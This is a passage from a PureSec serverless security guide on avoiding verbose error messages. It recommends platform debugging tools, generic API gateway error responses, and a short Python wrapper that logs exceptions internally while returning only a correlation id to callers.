| Ease of debugging and tracing | Easy to debug applications using a standard debugger or IDE tracing capabilities | At the time of writing, debugging serverless applications is still more complex than debugging traditional applications. Some developers might be tempted to use verbose error messages and debug prints |

MITIGATION

Developers are encouraged to use the debugging facilities provided by their serverless architecture and to avoid verbose debug printing as a means of debugging software.

In addition, if your serverless environment supports defining custom error responses, such as those provided by API gateways, we recommend that you create simple error messages that do not reveal any details about the internal implementation or any environment variables.
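The same separation can also be applied inside the function itself: log the full exception internally, and return only a generic message plus a correlation id to the caller. A minimal sketch (the wrapper, its names and the response shape are our own illustration, not a provider API):

```python
import logging
import traceback
import uuid

logger = logging.getLogger("app")

def safe_handler(event, do_work):
    """Run `do_work`, logging full details internally while returning
    only a generic message and a correlation id to the caller."""
    try:
        return {"statusCode": 200, "body": do_work(event)}
    except Exception:
        error_id = str(uuid.uuid4())
        # The full stack trace goes to internal logs only
        logger.error("error %s: %s", error_id, traceback.format_exc())
        return {"statusCode": 500,
                "body": f"Internal error (reference: {error_id})"}
```

The correlation id lets support staff find the detailed log entry, while the end user never sees stack traces, environment variables or other implementation details.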

ACKNOWLEDGEMENTS

The following PureSec contributors were involved in the preparation of this document:

PureSec would like to thank the following individuals and organizations for reviewing the document and providing their valuable insights and comments (in alphabetical order):